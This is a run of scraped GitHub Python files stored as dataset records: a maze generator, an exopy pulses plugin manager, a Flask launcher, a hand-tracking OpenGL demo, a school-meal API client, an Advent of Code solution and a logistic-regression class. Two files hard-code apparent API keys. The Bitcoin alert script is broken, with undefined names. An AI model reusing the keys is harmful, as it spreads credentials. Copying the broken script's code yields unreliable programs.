cell2.walls[1] = False\n elif x == -1:\n cell2.walls[3] = False\n cell1.walls[1] = False\n \n y = cell1.j - cell2.j\n if y == 1:\n cell1.walls[0] = False\n cell2.walls[2] = False\n elif y == -1:\n cell2.walls[0] = False\n cell1.walls[2] = False\n \n\ndef draw():\n \n global current\n \n canvas.delete(\"all\")\n \n for cell in cells_grid:\n cell.show()\n \n current.visited = True\n current.highlight()\n \n next_cell = current.checkNeighbours(cells_grid)\n if next_cell:\n next_cell.visited = True\n \n cells_stek.append(current)\n \n removeWalls(current, next_cell)\n \n current = next_cell\n elif len(cells_stek) > 0:\n current = cells_stek.pop()\n \n \n root.after(10, draw)\n \ndraw()\nroot.mainloop() ","repo_name":"immortalBan/Finashe4ka","sub_path":"Практикум по программированию/Практика 3/MazeGenerator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"73"} +{"seq_id":"73257551596","text":"import os\nimport logging\nimport enaml\n\nfrom watchdog.observers import Observer\nfrom atom.api import (Dict, List, Str, Typed, ForwardTyped)\nfrom exopy.utils.plugin_tools import (HasPreferencesPlugin,\n ExtensionsCollector,\n DeclaratorsCollector)\nfrom exopy.utils.watchdog import SystematicFileUpdater\n\nfrom .pulse import Pulse\nfrom .filters import SequenceFilter\nfrom .utils.sequences_io import load_sequence_prefs\nfrom .declarations import (Sequence, Sequences, SequenceConfig,\n SequenceConfigs, Contexts, Context, Shapes, Shape)\nfrom .shapes.modulation import Modulation\nfrom .infos import SequenceInfos, PulseInfos\nfrom .sequences.template_sequence import TemplateSequence\n\nwith enaml.imports():\n from .pulse_view import PulseView\n from .sequences.views.template_view import TemplateSequenceView\n\n\nFILTERS_POINT = 'exopy.pulses.filters'\nSEQUENCES_POINT = 'exopy.pulses.sequences'\nCONFIGS_POINT = 'exopy.pulses.configs'\nCONTEXTS_POINT = 'exopy.pulses.contexts'\nSHAPES_POINT = 'exopy.pulses.shapes'\n\nMODULE_ANCHOR = 'exopy_pulses'\n\n\ndef workspace_state():\n from .workspace.workspace import SequenceEditionSpaceState\n return SequenceEditionSpaceState\n\n\ndef workspace():\n from .workspace.workspace import SequenceEditionSpace\n return SequenceEditionSpace\n\n\nclass PulsesManagerPlugin(HasPreferencesPlugin):\n \"\"\"Plugin responsible for managing pulses.\n\n \"\"\"\n #: Folders containings templates which should be loaded.\n templates_folders = List() # .tag(pref=True) # TODO harcoded currently\n\n #: List of all known sequences and 
template-sequences.\n sequences = List(Str())\n\n #: List of all known contexts\n contexts = List(Str())\n\n #: List of all known shape.\n shapes = List(Str())\n\n #: List of all known filters:\n filters = List()\n\n #: Reference to the workspace or None if the workspace is not active.\n workspace = ForwardTyped(workspace)\n\n #: Reference to the workspace state.\n workspace_state = ForwardTyped(workspace_state)\n\n def start(self):\n \"\"\" Start the plugin life-cycle.\n\n This method is called by the framework at the appropriate time.\n It should never be called by user code.\n\n \"\"\"\n super(PulsesManagerPlugin, self).start()\n core = self.workbench.get_plugin('enaml.workbench.core')\n core.invoke_command('exopy.app.errors.enter_error_gathering')\n\n state = core.invoke_command('exopy.app.states.get',\n {'state_id': 'exopy.app.directory'})\n\n p_dir = os.path.join(state.app_directory, 'pulses')\n # Create pulses subfolder if it does not exist.\n if not os.path.isdir(p_dir):\n os.mkdir(p_dir)\n\n temp_dir = os.path.join(p_dir, 'templates')\n # Create templates subfolder if it does not exist.\n if not os.path.isdir(temp_dir):\n os.mkdir(temp_dir)\n\n self.templates_folders = [temp_dir]\n\n # Start the Declarators and Extensions collectors to collect\n # all elements of the plugin that are declared through enaml\n # declarations\n self._filters = ExtensionsCollector(workbench=self.workbench,\n point=FILTERS_POINT,\n ext_class=SequenceFilter)\n\n self._configs = DeclaratorsCollector(workbench=self.workbench,\n point=CONFIGS_POINT,\n ext_class=(SequenceConfig,\n SequenceConfigs))\n\n self._sequences = DeclaratorsCollector(workbench=self.workbench,\n point=SEQUENCES_POINT,\n ext_class=(Sequences, Sequence))\n\n self._contexts = DeclaratorsCollector(workbench=self.workbench,\n point=CONTEXTS_POINT,\n ext_class=(Contexts, Context))\n\n self._shapes = DeclaratorsCollector(workbench=self.workbench,\n point=SHAPES_POINT,\n ext_class=(Shapes, Shape))\n\n # Bind the observers before starting the collectors so that they will\n # update the lists of known seq, configs, filters, contexts...\n self._bind_observers()\n\n self._sequences.start()\n self._configs.start()\n self._filters.start()\n self._contexts.start()\n self._shapes.start()\n\n # Populate the Pulse Info Object\n self._pulse_infos = PulseInfos()\n self._pulse_infos.cls = Pulse\n self._pulse_infos.view = PulseView\n\n core.invoke_command('exopy.app.errors.exit_error_gathering')\n\n def stop(self):\n \"\"\" Stop the plugin life-cycle.\n\n This method is called by the framework at the appropriate time.\n It should never be called by user code.\n\n \"\"\"\n super(PulsesManagerPlugin, self).stop()\n self._unbind_observers()\n self._template_sequences_data.clear()\n self._template_sequences_infos.clear()\n\n # Stop all Extension/DeclaratorCollectors\n self._filters.stop()\n self._configs.stop()\n self._sequences.stop()\n self._contexts.stop()\n self._shapes.stop()\n\n def get_item_infos(self, item_id):\n \"\"\"Give access to an item infos.\n\n NB : an item can be a sequence or a pulse.\n\n Parameters\n ----------\n item_id : unicode\n The id of the requested item.\n\n Returns\n -------\n item_infos : ItemInfos or None\n The required item infos or None if it was not found.\n\n \"\"\"\n if item_id == \"exopy_pulses.Pulse\":\n return self._pulse_infos\n if item_id in self._sequences.contributions:\n return self._sequences.contributions[item_id]\n elif item_id in self._template_sequences_infos:\n t_info = self._template_sequences_infos[item_id]\n 
if not t_info.metadata['loaded']:\n config, doc = load_sequence_prefs(t_info.metadata['path'])\n t_info.metadata['template_config'] = config\n t_info.metadata['template_doc'] = doc\n t_info.metadata['loaded'] = True\n return t_info\n elif item_id == \"exopy_pulses.__template__\":\n infos = SequenceInfos()\n infos.cls = TemplateSequence\n infos.view = TemplateSequenceView\n return infos\n else:\n return None\n\n def get_item(self, item_id, view=False):\n \"\"\"Access a given item class.\n\n Parameters\n ----------\n item_id : unicode\n Id of the item for which to return the actual class.\n\n view : bool, optional\n Whether or not to return the view assoicated with the item.\n\n Returns\n -------\n item_cls : type or None\n Class associated to the requested item or None if the item was not\n found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if requested.\n\n \"\"\"\n infos = self.get_item_infos(item_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n def get_items(self, item_ids):\n \"\"\"Access the classes associated to a set of items.\n\n Parameters\n ----------\n item_ids : list(unicode)\n Ids of the item for which to return the actual class.\n\n Returns\n -------\n items_cls : dict\n Dictionary mapping the requested items to the actual classes.\n\n missing : list\n List of items that were not found.\n\n \"\"\"\n items_cls = {}\n missing = []\n for t in item_ids:\n res = self.get_item(t)\n if res:\n items_cls[t] = res\n else:\n missing.append(t)\n\n return items_cls, missing\n\n def get_context_infos(self, context_id):\n \"\"\"Give access to a context infos.\n\n Parameters\n ----------\n context_id : unicode\n Id of the requested context.\n\n Returns\n -------\n context_infos : ContextInfos or None\n Infos for the requested context or None if the context was not\n found.\n\n \"\"\"\n return self._contexts.contributions.get(context_id)\n\n def get_context(self, context_id, view=False):\n \"\"\"Access the class associated with a context.\n\n Parameters\n ----------\n context_id : unicode\n Id of the context for which to return the class\n\n view : bool, optional\n Whether or not to return the view associated with context.\n\n Returns\n -------\n context_cls : type or None\n Class associated to the requested context or None if the context\n was not found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if requested.\n\n \"\"\"\n infos = self.get_context_infos(context_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n def get_shape_infos(self, shape_id):\n \"\"\" Give access to a shape infos.\n\n Parameters\n ----------\n shape : unicode\n Id of the requested shapes.\n view : bool\n When false, the view is not returned alongside the class.\n\n Returns\n -------\n shape_infos : ShapeInfos or None\n The required shape infos or None if the shape was not found.\n\n \"\"\"\n return self._shapes.contributions.get(shape_id)\n\n def get_shape(self, shape_id, view=False):\n \"\"\"Access the class associated with a shape.\n\n Parameters\n ----------\n shape_id : unicode\n Id of the shape for which to return the class\n\n view : bool, optional\n Whether or not to return the view associated with context.\n\n Returns\n -------\n context_cls : type or None\n Class associated to the requested shape or None if the shape\n was not found.\n\n item_view : EnamlDefMeta or None, optional\n Associated view if 
requested.\n\n \"\"\"\n infos = self.get_shape_infos(shape_id)\n if not infos:\n return None if not view else (None, None)\n else:\n return infos.cls if not view else (infos.cls, infos.view)\n\n # TODO for future easiness of extension\n # Note that the pulse view should be updated too\n def get_modulation_infos(self, modulation_id):\n \"\"\"\n \"\"\"\n raise NotImplementedError()\n\n def get_modulation(self, modulation_id, view=False):\n \"\"\"Get the modulation class.\n\n \"\"\"\n if modulation_id == 'exopy_pulses.Modulation':\n return Modulation\n else:\n return None\n\n def get_config(self, sequence_id):\n \"\"\" Access the proper config for a sequence.\n\n Parameters\n ----------\n sequence_id : str\n Id of the sequence for which a config is required\n\n Returns\n -------\n config : tuple\n Tuple containing the config object requested, and its visualisation\n\n Notes\n -----\n It is the responsability of the user to properly set the root attribute\n of the returned config object.\n\n \"\"\"\n templates = self._template_sequences_data\n if sequence_id in templates:\n config_infos = self._configs.contributions['__template__']\n conf_cls = config_infos.cls\n conf_view = config_infos.view\n t_config, t_doc = load_sequence_prefs(templates[sequence_id])\n conf = conf_cls(manager=self,\n template_config=t_config,\n template_doc=t_doc,\n root=self.workspace.state.sequence)\n view = conf_view(model=conf)\n return conf, view\n\n elif sequence_id in self._sequences.contributions:\n configs = self._configs.contributions\n # Look up the hierarchy of the selected sequence to get the\n # appropriate SequenceConfig\n sequence_class = self._sequences.contributions[sequence_id].cls\n for i_class in type.mro(sequence_class):\n if i_class in configs:\n conf_cls = configs[i_class].cls\n conf_view = configs[i_class].view\n conf = conf_cls(manager=self,\n sequence_class=sequence_class)\n view = conf_view(model=conf)\n return conf, view\n\n return None, None\n\n def list_sequences(self, filter_name='All'):\n \"\"\" Filter the known sequences using the specified filter.\n\n Parameters\n ----------\n filter_name : str\n Name of the filter to use\n\n Returns\n -------\n sequences : list(str) or None\n Sequences selected by the filter, or None if the filter does not\n exist.\n\n \"\"\"\n s_filter = self._filters.contributions.get(filter_name)\n if s_filter:\n # Remove items that should not be shown in the list\n sequences = self._sequences.contributions.copy()\n template_sequences_data = self._template_sequences_data.copy()\n\n try:\n sequences.pop('exopy_pulses.RootSequence')\n except KeyError: # pragma: no cover\n pass\n return s_filter.filter_sequences(sequences,\n template_sequences_data)\n else:\n logger = logging.getLogger(__name__)\n logger.warning(\"Did not find the filter \" + str(filter_name) +\n \" and returned zero elements.\")\n return []\n\n # --- Private API ---------------------------------------------------------\n\n #: Sequences implemented in Python\n _sequences = Typed(DeclaratorsCollector)\n\n #: Template sequences (store full path to .ini)\n _template_sequences_data = Dict(Str(), Str())\n\n #: Template sequences infos\n _template_sequences_infos = Dict(Str(), SequenceInfos)\n\n #: Info Object for Pulse\n _pulse_infos = Typed(PulseInfos)\n\n #: Sequence contexts.\n _contexts = Typed(DeclaratorsCollector)\n\n #: Task config dict for python tasks (task_class: (config, view))\n _shapes = Typed(DeclaratorsCollector)\n\n #: Contributed task filters.\n _filters = Typed(ExtensionsCollector)\n\n #: 
Configuration object used to insert new sequences in existing ones.\n _configs = Typed(DeclaratorsCollector)\n\n # Watchdog observer\n _observer = Typed(Observer, ())\n\n def _refresh_known_template_sequences(self):\n \"\"\"Refresh the known template sequences.\n\n \"\"\"\n templates = {}\n for path in self.templates_folders:\n if os.path.isdir(path):\n filenames = [f for f in os.listdir(path)\n if (os.path.isfile(os.path.join(path, f)) and\n f.endswith('.temp_pulse.ini'))]\n filenames.sort()\n for filename in filenames:\n template_name = filename[:-len('.temp_pulse.ini')]\n template_path = os.path.join(path, filename)\n\n # Beware redundant names are overwrited\n templates[template_name] = template_path\n else:\n logger = logging.getLogger(__name__)\n logger.warning('{} is not a valid directory'.format(path))\n\n self._template_sequences_data = templates\n aux = (list(self._sequences.contributions) +\n list(templates))\n\n self.sequences = aux\n self._refresh_template_sequences_infos()\n\n def _refresh_template_sequences_infos(self):\n \"\"\" Refresh the known template sequence infos.\n\n \"\"\"\n # TODO Should be more proper in case of update\n\n templates = self._template_sequences_data\n templates_infos = {}\n\n for template_name, template_path in templates.items():\n\n metadata = {'is_template': True, 'path': template_path,\n 'loaded': False}\n infos = SequenceInfos(metadata=metadata)\n infos.cls = TemplateSequence\n infos.view = TemplateSequenceView\n templates_infos[template_name] = infos\n\n self._template_sequences_infos = templates_infos\n\n def _update_filters(self, change):\n \"\"\" Update the list of known filters.\n\n \"\"\"\n self.filters = list(self._filters.contributions.keys())\n\n def _update_known_contexts(self, change):\n \"\"\" Update the list of known contexts.\n\n \"\"\"\n self.contexts = list(self._contexts.contributions.keys())\n\n def _update_known_sequences(self, change):\n \"\"\" Update the list of known sequences.\n\n \"\"\"\n self.sequences = list(self._sequences.contributions.keys())\n\n #: Always refresh the list of known templates after refreshing\n #: sequences, as we could have just added a template.\n self._refresh_known_template_sequences()\n\n def _update_known_shapes(self, change):\n \"\"\" Update the list of known shapes.\n\n \"\"\"\n self.shapes = list(self._shapes.contributions.keys())\n\n def _bind_observers(self):\n \"\"\" Setup the observers for the plugin.\n\n \"\"\"\n for folder in self.templates_folders:\n handler = SystematicFileUpdater(\n self._refresh_known_template_sequences)\n self._observer.schedule(handler, folder, recursive=True)\n\n self._observer.start()\n\n self._contexts.observe('contributions', self._update_known_contexts)\n self._shapes.observe('contributions', self._update_known_shapes)\n self._sequences.observe('contributions', self._update_known_sequences)\n self._filters.observe('contributions', self._update_filters)\n\n self.observe('templates_folders', self._update_templates)\n\n def _unbind_observers(self):\n \"\"\" Remove the observers for the plugin.\n\n \"\"\"\n self.unobserve('templates_folders', self._update_templates)\n self._filters.unobserve('contributions', self._update_filters)\n self._observer.unschedule_all()\n self._observer.stop()\n self._observer.join()\n\n def _update_templates(self, change):\n \"\"\"Observer ensuring that we observe the right template folders.\n\n \"\"\"\n self._observer.unschedule_all()\n\n for folder in self.templates_folders:\n if not os.path.isdir(folder):\n continue\n handler = 
SystematicFileUpdater(\n self._refresh_known_template_sequences)\n self._observer.schedule(handler, folder, recursive=True)\n\n self._refresh_known_template_sequences()\n","repo_name":"Exopy/exopy_pulses","sub_path":"exopy_pulses/pulses/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":19268,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"41559678712","text":"'''\nO seguinte programa pega dados da api alpha_vantage, imprime os valores das ações do BTC na tela\n e emite um alerta caso a ultima variação do preco seja maior que 0.004\n'''\nimport pandas as pd\nfrom alpha_vantage.timeseries import TimeSeries\nfrom alpha_vantage import cryptocurrencies\n\napi_key = 'Z92Y0437GIRE1RCO'\n\nExchange_Rate = CURRENCY_EXCHANGE_RATE (from_currency = USD, to_currency=BTC)\n\nts = TimeSeries(key='api_key', output_format='pandas')\nfunction = cryptocurrencies.DIGITAL_CURRENCY_DAILY(symbol='BTC', market='USD', interval='day', outputsize='full')\n\nprint('Os dados do BTC são: ')\nprint(function)\n\n#i =1\n#para exportar em excel ou csv\n#while i==1:\n# data.to_excel(\"output.xlsx\")\n# time.sleep(60)\n\nclose_data = data['4. close']\npercentage_change = close_data.pct_change()\n\nprint(percentage_change)\n\nlast_change = percentage_change[-1]\n\n\nif abs(last_change) > 0.004:\n print('MSFT Alert'+ last_change)\n\n ","repo_name":"ArthurGini/EstudosPython","sub_path":"Financeiro/BTCStocks.py","file_name":"BTCStocks.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"32185666393","text":"# SJTU EE208\nimport os\nimport sys\n\nfrom werkzeug.utils import secure_filename\n\nfrom backend.SearchPages import init_lucene\nfrom flask import Flask, flash, redirect, render_template, request, url_for\n\nUPLOAD_FOLDER = './uploads'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\n\n\n\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n app.config.from_mapping(\n ENV='development',\n SECRET_KEY='dev',\n #DATABASE=os.path.join(app.instance_path, 'flaskr.sqlite'),\n )\n\n if test_config is None:\n # load the instance config, if it exists, when not testing\n app.config.from_pyfile('config.py', silent=True)\n else:\n # load the test config if passed in\n app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n init_lucene() \n\n # a simple page that says hello\n @app.route('/')\n def redirect_to_search():\n #return redirect(url_for('search.search_results',keywords='中国'))\n return redirect(url_for('search.search_webpages'))\n import search\n app.register_blueprint(search.bp)\n return app\n\n\napp=create_app()\napp.run(debug=True,port=8080)\napp.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0\n#https://stackoverflow.com/questions/34066804/disabling-caching-in-flask\n#@app.before_first_request\n\n\n'''\n@app.route('/form', methods=['POST', 'GET'])\ndef bio_data_form():\n if request.method == \"POST\":\n username = request.form['username']\n age = request.form['age']\n email = request.form['email']\n hobbies = request.form['hobbies']\n return redirect(url_for('showbio', username=username, age=age, email=email, hobbies=hobbies))\n return render_template(\"bio_form.html\")\n\n\n@app.route('/showbio', methods=['GET'])\ndef showbio():\n 
username = request.args.get('username')\n age = request.args.get('age')\n email = request.args.get('email')\n hobbies = request.args.get('hobbies')\n return render_template(\"show_bio.html\", username=username, age=age, email=email, hobbies=hobbies)\n\n\nif __name__ == '__main__':\n app.run(debug=True, port=8080)\n'''\n","repo_name":"wzj423/SJTU-EE208-Proj","sub_path":"flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"16470253309","text":"import cv2\r\nimport mediapipe as mp\r\nimport math\r\nimport pygame\r\nfrom pygame.locals import *\r\nfrom OpenGL.GL import *\r\nfrom OpenGL.GLU import *\r\n\r\nverticies = (\r\n (1, -1, -1),\r\n (1, 1, -1),\r\n (-1, 1, -1),\r\n (-1, -1, -1),\r\n (1, -1, 1),\r\n (1, 1, 1),\r\n (-1, -1, 1),\r\n (-1, 1, 1)\r\n )\r\n\r\nedges = (\r\n (0,1),\r\n (0,3),\r\n (0,4),\r\n (2,1),\r\n (2,3),\r\n (2,7),\r\n (6,3),\r\n (6,4),\r\n (6,7),\r\n (5,1),\r\n (5,4),\r\n (5,7)\r\n )\r\n\r\n\r\ndef Cube():\r\n glBegin(GL_LINES)\r\n for edge in edges:\r\n for vertex in edge:\r\n glVertex3fv(verticies[vertex])\r\n glEnd()\r\n\r\n# Create a VideoCapture object to read frames from the camera\r\ncap = cv2.VideoCapture(0)\r\n\r\n# Create a MediaPipe Hands object and configure the drawing settings\r\nmp_hands = mp.solutions.hands\r\nhands = mp_hands.Hands(static_image_mode=False, max_num_hands=2, min_detection_confidence=0.5)\r\nmp_drawing = mp.solutions.drawing_utils\r\ndrawing_styles = mp.solutions.drawing_styles\r\n\r\n# Set the background color to black\r\nbg_color = (0, 0, 0) # Black color\r\n\r\n# Set the hand landmarks and finger connections color to white\r\nlandmark_color = (255, 255, 255) # White color\r\nconnection_color = (255, 255, 255) # White color\r\npygame.init()\r\ndisplay = (800,600)\r\npygame.display.set_mode(display, DOUBLEBUF|OPENGL)\r\n\r\ngluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\r\n\r\nglTranslatef(0.0,0.0, -5)\r\n# Start the video processing loop\r\nwhile True:\r\n # Read frame from camera\r\n success, image = cap.read()\r\n if not success:\r\n break\r\n\r\n # Flip the image horizontally for a mirror-like effect\r\n image = cv2.flip(image, 1)\r\n\r\n # Convert the image to RGB\r\n image_rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\r\n\r\n # Process the image with MediaPipe Hands\r\n results = hands.process(image_rgb)\r\n\r\n # Clear the background by filling it with the bg_color\r\n image = cv2.rectangle(image, (0, 0), (image.shape[1], image.shape[0]), bg_color, -1)\r\n\r\n # Draw hand landmarks and finger connections on the image\r\n if results.multi_hand_landmarks:\r\n for hand_landmarks in results.multi_hand_landmarks:\r\n mp_drawing.draw_landmarks(\r\n image,\r\n hand_landmarks,\r\n mp_hands.HAND_CONNECTIONS,\r\n landmark_drawing_spec=mp_drawing.DrawingSpec(color=landmark_color, thickness=2, circle_radius=4),\r\n connection_drawing_spec=mp_drawing.DrawingSpec(color=connection_color, thickness=2, circle_radius=2),\r\n )\r\n\r\n # Calculate distance between index finger tip and thumb tip\r\n index_finger_tip = hand_landmarks.landmark[mp_hands.HandLandmark.INDEX_FINGER_TIP]\r\n thumb_tip = hand_landmarks.landmark[mp_hands.HandLandmark.THUMB_TIP]\r\n\r\n x_diff = -thumb_tip.x + index_finger_tip.x\r\n y_diff = -thumb_tip.y + index_finger_tip.y\r\n z_diff = -thumb_tip.z + index_finger_tip.z\r\n\r\n distance = math.sqrt(x_diff**2 + y_diff**2 + z_diff**2)\r\n\r\n for event in pygame.event.get():\r\n if event.type 
== pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n glRotatef(x_diff*100, y_diff*100, z_diff*100, 1)\r\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\r\n Cube()\r\n pygame.display.flip()\r\n pygame.time.wait(10)\r\n\r\n # Display the image\r\n cv2.imshow(\"Hand Tracking\", image)\r\n\r\n # Exit loop on 'q' key press\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# Release the VideoCapture and close the windows\r\ncap.release()\r\ncv2.destroyAllWindows()\r\n","repo_name":"srij1234/3d-fidget-spinner","sub_path":"spinner.py","file_name":"spinner.py","file_ext":"py","file_size_in_byte":3640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"39428101261","text":"import requests\nimport json\nfrom datetime import datetime\nurl = \"https://open.neis.go.kr/hub/mealServiceDietInfo\"\n\nservice_key = \"1aca86770d994a46aa72b9f94f2ba07e\"\n\nparams = {\n 'KEY' : service_key,\n 'Type' : 'json',\n 'pIndex' : '1',\n 'pSize' : '100',\n 'ATPT_OFCDC_SC_CODE' : 'S10',\n 'SD_SCHUL_CODE' : '9010041',\n \"MLSV_FROM_YMD\": datetime.today().strftime(\"%Y%m%d\"),\n \"MLSV_TO_YMD\" : datetime.today().strftime(\"%Y%m%d\")\n}\n\nresponse = requests.get(url, params=params)\nprint(response)\n\ndef find_meal():\n try:\n j_response = json.loads(response.text)[\"mealServiceDietInfo\"]\n if j_response[0][\"head\"][0][\"list_total_count\"] == 1:\n return j_response[1][\"row\"][0]\n else:\n return j_response[1][\"row\"]\n except:\n print(\"찾는 데이터가 없습니다.\")\n return response.text\n\n\ndef meal(x):\n data = find_meal()\n try:\n if x == 0:\n string = \"<중식>\\n\" + data[0][\"DDISH_NM\"].replace(\"
\", \"\\n\") + \"\\n\"\n else:\n string = \"<석식>\\n\" + data[1][\"DDISH_NM\"].replace(\"
\", \"\\n\")\n characters = \"1234567890./-*()\"\n for x in range(len(characters)):\n string = string.replace(characters[x], \"\")\n return string\n except:\n return \"오늘은 급식이 없습니다.\"\n","repo_name":"fruit8067/9jogithub","sub_path":"meal.py","file_name":"meal.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"4053659688","text":"inputs = open('inputs/day17.txt', 'r').read().strip()\n\ninputs = inputs[15:]\nxbounds, ybounds = [[int(i) for i in j.split(\"..\")] for j in inputs.split(\", y=\")]\n\ndef check_vel(vel_init):\n vel = vel_init\n pos = (0, 0)\n max_y = 0\n while pos[0] < xbounds[1] and pos[1] >= ybounds[0]:\n # print(pos, vel)\n pos = (pos[0]+vel[0], pos[1]+vel[1])\n max_y = max(max_y, pos[1])\n vx = 0\n if vel[0] >= 1:\n vx = vel[0]-1\n elif vel[0] <= -1:\n vx = vel[0]+1\n vel = (vx, vel[1]-1)\n if xbounds[0] <= pos[0] <= xbounds[1] and ybounds[0] <= pos[1] <= ybounds[1]:\n return True, max_y\n return False, 0\n\npossible_vels = set()\npart1 = 0\nfor x in range(0, 1000):\n for y in range(-1000, 1000):\n valid, max_y = check_vel((x, y))\n if valid:\n possible_vels.add((x, y))\n part1 = max(part1, max_y)\nprint(f\"part 1: {part1}\")\n\npart2 = len(possible_vels)\nprint(f\"part 2: {part2}\")\n","repo_name":"val-is/advent-of-code","sub_path":"2021/day17.py","file_name":"day17.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"73"} +{"seq_id":"29094754100","text":"from __future__ import division, print_function, absolute_import\n\nimport numpy as np\nfrom .minimize import bfgs, dfp, lbfgs, _norm\n\nclass Logistic_Regressor():\n \"\"\" logistic regression classifier\n\n This class implement L2 regularized logistic regression and solve the problem in primer form\n\n Parameters\n ----------\n C : float, default=1.0\n Regularization term, smaller C specify stronger regularization\n \n solver : {'bfgs', 'dfp', 'lbfgs'}\n Method used to solve the optimization problem\n\n Attributes\n ----------\n w : array, shape (n_features+1,)\n Coefficients of the features in the decision function\n\n gradient : array\n Gradient value at the time of termination\n\n inv_hessian : array\n Approximation of the inverse hessian from Quasi Newton\n\n \"\"\"\n\n def __init__(self, C=1.0, solver='bfgs'):\n self.C = C\n self.solver = solver.lower()\n self.w = None\n self.inv_hessian = None\n self.gradient = None\n\n def _sgd(self, X, y, batch_size=50, beta=8, maxiter=None, tol=1e-6, disp=False):\n \"\"\" \"\"\"\n m = len(y)\n\n if m == 1:\n w = np.ones(len(X))\n else:\n w = np.ones(X.shape[1])\n \n if maxiter is None:\n maxiter = int(m * 10 / batch_size)\n print('Total iterations: {}'.format(maxiter))\n \n for k in xrange(maxiter):\n start = (k * batch_size) % m\n end = ((k+1)*batch_size) % m\n if start < end:\n X_batch = X[start:(end+1)]\n y_batch = y[start:(end+1)]\n else:\n X_batch = np.append(X[start:], X[:(end+1)], 0)\n y_batch = np.append(y[start:], y[:(end+1)])\n \n exp_margin = 1 - 1. 
/ (1 + np.exp(-np.dot(X_batch, w)*y_batch))\n gk = (w - self.C * np.dot(X_batch.transpose(), exp_margin*y_batch)) / batch_size\n \n alphak = beta / (k+1)\n w = w - alphak * gk\n if disp:\n print('---------------------')\n print('Current iteration: {}'.format(k))\n print('current batch ||gk||: {}'.format(_norm(gk)))\n\n self.w = w\n self.gradient = gk\n \n def train(self, X, y, options=None):\n \"\"\" Fit the model given training data\n\n Parameters\n ----------\n X : array, shape (n_samples, n_features)\n Training samples, each has n_features features\n\n y : array, shape (n_samples,)\n Target values\n\n options : dict\n Other options controlling the behavior of the solver, pass directly to the solver as **options\n \n Returns\n ----------\n self\n\n \"\"\"\n\n if options is None:\n options = dict()\n \n _X = np.copy(np.asarray(X))\n _y = np.copy(np.asarray(y))\n _y[_y==0] = -1\n m, n = X.shape\n _X = np.append(_X, np.ones((m, 1)), 1)\n\n if self.w is None:\n self.w = np.zeros(n+1)\n else:\n print('Seems the regressor has already been trained')\n return self\n\n if self.solver == 'bfgs':\n opt = bfgs\n elif self.solver == 'dfp':\n opt = dfp\n elif self.solver == 'lbfgs':\n opt = lbfgs\n elif self.solver == 'sgd':\n self._sgd(_X, _y, **options)\n return self\n \n func = lambda w: 0.5 * np.dot(w, w) + self.C * np.sum(np.log(1+np.exp(-np.dot(_X, w)*_y)))\n exp_margin = lambda w: 1 - 1. / (1 + np.exp(-np.dot(_X, w)*_y))\n fprime = lambda w: w - self.C * np.dot(_X.transpose(), exp_margin(w)*_y)\n\n results = opt(func, fprime, self.w, **options)\n self.w = results['x_star']\n self.gradient = results['gradient']\n if self.solver != 'lbfgs':\n self.inv_hessian = results['inv_hessian']\n\n return self\n \n def predict_proba(self, X):\n \"\"\" \"\"\"\n _X = np.copy(np.asarray(X))\n if len(_X.shape) == 1:\n _X = np.append(_X, 1)\n else:\n m = _X.shape[0]\n _X = np.append(_X, np.ones((m, 1)), 1)\n \n if self.w is None:\n print('Please train the model first!')\n return None\n else:\n return 1. 
/ (1 + np.exp(-np.dot(_X, self.w)))\n\n def predict(self, X, threshold=0.5):\n \"\"\" \"\"\"\n return np.asarray(self.predict_proba(X) > threshold, dtype=int)\n\n def score(self, X, y, verbose=False):\n \"\"\" \"\"\"\n m = len(y)\n n_pos = sum(y==1)\n y_pred = self.predict(X)\n n_pos_pred = sum(y_pred)\n precision = 0\n recall = 0\n if n_pos_pred > 0:\n precision = np.sum(y_pred[y_pred==y]==1) / n_pos_pred\n if n_pos > 0:\n recall = np.sum(y[y_pred==y]==1) / n_pos\n accuracy = sum(y_pred == y) / m\n\n if verbose:\n print('Sample size: {}'.format(m))\n print('Number of positives in the sample: {}'.format(n_pos))\n print('Number of predicted positives: {}'.format(n_pos_pred)) \n print(' Precision is: {:0.4f}'.format(precision))\n print(' Recall is {:0.4f}'.format(recall))\n print(' Prediction accuracy: {:0.4f}'.format(accuracy)) \n\n return dict(precision=precision, recall=recall, accuracy=accuracy)\n\n \n","repo_name":"yjxiao/no-project-quasi-newton","sub_path":"optimize/log_reg.py","file_name":"log_reg.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"24664910438","text":"from ClaseMedicamentos import Medicamentos\r\nimport csv\r\n\r\nclass ManejadorMaedicamentos:\r\n 